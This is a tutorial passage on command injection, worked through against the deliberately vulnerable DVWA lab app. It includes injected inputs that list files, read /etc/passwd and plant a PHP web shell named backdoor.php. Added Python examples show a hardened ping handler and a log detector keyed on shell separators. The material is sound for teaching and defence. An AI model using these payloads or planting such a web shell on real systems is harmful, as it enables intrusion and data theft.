Command execution

Command-injection vulnerabilities arise when poorly validated user input is passed to the system shell. An attacker appends their own commands to that input, and the shell executes them on the system alongside the intended command.

One case where you may find this is an application that takes user input, for example a username or email address, and creates a folder on the system that's used to house that user's data, file uploads, and so on.

In our target system, DVWA, there is a page that is used to demonstrate this flaw by exploiting user input that is passed to the system ping command. Let's log in to DVWA again on the OWASP Broken Apps VM and select command injection from the menu on the left:

As stated before, this input is passed to the ping command, so it should be an IP address. We can confirm this by passing 127.0.0.1:

We get the expected result. Now, let's try to pass another command into this input. We know that this application is being hosted on Linux. To join commands in Linux, we can use && between the commands.

With &&, the previous command must complete successfully before the following command gets executed. A semicolon (;) will execute the next command whether or not the previous one completed successfully. Let's try it with a basic ls command. In the input box, enter 127.0.0.1; ls and then click Submit:

Now we've confirmed that the input is not validated before it is processed, because the lines after the ping statistics list the files in the current directory. We can expand on this to find out which directory we're in and which user is executing the commands. Enter 127.0.0.1; pwd; whoami:
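Here is an added example, not DVWA's own code or the author's, showing the pattern behind this flaw and its fix. DVWA's exec page is written in PHP; this hypothetical Python port builds the same ping command two ways: the vulnerable way (string concatenation handed to a shell) and the hardened way (strict IP validation plus an argument list, so no shell ever sees the input). The function names are assumptions. The last function uses echo rather than ping so it runs anywhere, and shows that without a shell the whole payload stays one literal argument.

```python
"""Vulnerable vs. hardened handling of a 'ping this host' feature.

Added example: a hypothetical Python port of the DVWA pattern, not DVWA code.
"""
import ipaddress
import subprocess


def build_vulnerable_command(target: str) -> str:
    """The flawed pattern: user input is concatenated into a shell string.

    Anything after ';' or '&&' in `target` becomes a second command once the
    string is handed to a shell. This function only builds the string so the
    reader can see what the shell would receive; it never executes it.
    """
    return "ping -c 3 " + target


def validate_target(target: str) -> str:
    """Positive validation: accept only a syntactically valid IPv4/IPv6
    address and return its canonical form. Everything else is rejected
    (hostnames are deliberately out of scope for this example)."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None


def build_hardened_command(target: str) -> list[str]:
    """Validate first, then build an argv list. With a list there is no shell
    to interpret ';', '&&' or '|', so the input can only ever be one argument
    to ping, and validation guarantees it is an address."""
    return ["ping", "-c", "3", validate_target(target)]


def run_ping(target: str) -> str:
    """Run the hardened command without a shell and return ping's output."""
    argv = build_hardened_command(target)
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=15, check=False)
    return result.stdout


def demo_argv_is_literal(payload: str) -> str:
    """Show that an argv list keeps the whole payload as one argument:
    run `echo <payload>` with no shell and return what echo printed.
    Uses echo instead of ping so it runs offline on any Unix-like host."""
    out = subprocess.run(["echo", payload], capture_output=True,
                         text=True, check=True)
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "127.0.0.1; ls"
    print("shell would receive:", build_vulnerable_command(payload))
    print("argv keeps it literal:", demo_argv_is_literal(payload))
    try:
        build_hardened_command(payload)
    except ValueError as err:
        print("hardened handler rejects it:", err)
```

The two defences are independent and both are worth having: the argv list removes the shell, so separator characters lose their meaning, and the address check rejects anything that is not an IP before a process is even started, which also stops argument-injection tricks such as a value beginning with a dash.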

From our results, we see that we're currently in the /owaspbwa/dvwa-git/vulnerabilities/exec directory and we're executing the commands as the www-data user. Now let's try to print the contents of a file, specifically the /etc/passwd file. In the input field, enter 127.0.0.1 and cat /etc/passwd:

This snippet should look like the results from our earlier LFI.

Let's do one more thing: create a file in this directory that we can come back to later to execute commands. Enter 127.0.0.1 and echo "<?php system($_GET['cmd']) ?>" > backdoor.php. This should create a PHP file named backdoor.php containing the PHP code system($_GET['cmd']).

Now, in the browser, navigate to <ip address>/dvwa/vulnerabilities/exec/backdoor.php.

The page loads, but nothing is displayed. This is because we have not passed any commands yet. Looking at what we typed, the name in single quotes is cmd. This is the request parameter that holds the command we want to run and hands it to system() for execution. To execute a command, after backdoor.php in the address bar, enter ?cmd= followed by your command. I'll use ls as a basic demo:

Use your imagination from this point to try different possibilities. Admittedly, the presentation needs a bit of work, but you can always view the source code to clean it up:

I would add that you can use the Repeater in Burp Suite to perform these steps, and you can also use Burp Suite in conjunction with sqlmap and Metasploit to get a Meterpreter shell.
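From the defender's side, the requests in this walkthrough leave a recognisable trail. The following is an added example (not part of the original page) that scans constructed request records for two signals: decoded parameter values that contain shell separators, and requests for files under the exec/ directory that are not in a baseline of known application files, which is how a dropped backdoor.php shows up. The record format, the baseline set and the function names are assumptions. Whether the parameters are visible at all depends on what your logging captures: DVWA submits this form by POST, so a plain access log shows only the query string, and you need a WAF, reverse proxy or application log that records request bodies.

```python
"""Detect command-injection attempts and unexpected files from request records.

Added example with constructed data; the record format and the baseline of
known files are assumptions, not taken from DVWA or its logs.
"""
import re
from urllib.parse import parse_qsl

# Sequences a POSIX shell treats as command separators or substitution.
# A bare '&' is not listed because it is also the query-string separator;
# values are percent-decoded before matching, so an encoded '&&' is caught.
SHELL_SEPARATORS = re.compile(r"(;|&&|\|\||\||`|\$\(|\n)")

# Hypothetical baseline of PHP entry points under the exec page. Generate a
# real baseline from the deployed code tree, never from observed traffic.
KNOWN_EXEC_FILES = {
    "/dvwa/vulnerabilities/exec/",
    "/dvwa/vulnerabilities/exec/index.php",
}

# Constructed request records: (client, path, url-encoded parameters).
REQUESTS = [
    ("198.51.100.7", "/dvwa/vulnerabilities/exec/", "ip=127.0.0.1&Submit=Submit"),
    ("198.51.100.7", "/dvwa/vulnerabilities/exec/", "ip=127.0.0.1%3B+ls&Submit=Submit"),
    ("198.51.100.7", "/dvwa/vulnerabilities/exec/", "ip=127.0.0.1%3B+pwd%3B+whoami&Submit=Submit"),
    ("198.51.100.7", "/dvwa/vulnerabilities/exec/backdoor.php", "cmd=ls"),
    ("203.0.113.5", "/dvwa/vulnerabilities/exec/", "ip=10.0.0.8&Submit=Submit"),
]


def find_injection_params(query: str) -> list[tuple[str, str]]:
    """Decode the parameters and return (name, value) pairs whose value
    contains a shell separator. parse_qsl handles %XX and '+' decoding."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SHELL_SEPARATORS.search(value):
            hits.append((name, value))
    return hits


def is_unknown_exec_file(path: str) -> bool:
    """True for any path under the exec/ directory that is not in the
    baseline, e.g. a PHP file written there through the injection."""
    return (path.startswith("/dvwa/vulnerabilities/exec/")
            and path not in KNOWN_EXEC_FILES)


def analyze(requests) -> list[tuple[str, str, str]]:
    """Return (client, reason, detail) alerts for the given records."""
    alerts = []
    for client, path, query in requests:
        for name, value in find_injection_params(query):
            alerts.append((client, "shell separator in parameter", f"{name}={value}"))
        if is_unknown_exec_file(path):
            alerts.append((client, "request to unknown file under exec/", path))
    return alerts


if __name__ == "__main__":
    for client, reason, detail in analyze(REQUESTS):
        print(f"{client:14} {reason:40} {detail}")
```

Separator matching is a cheap first filter but it is signature-based; the stronger signal for a parameter like ip is positive validation, flagging every value that is not a syntactically valid address, since that also catches payloads that use a separator you did not list. The unknown-file check is what catches the second half of the walkthrough, because a request to backdoor.php?cmd=ls contains no separator at all.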
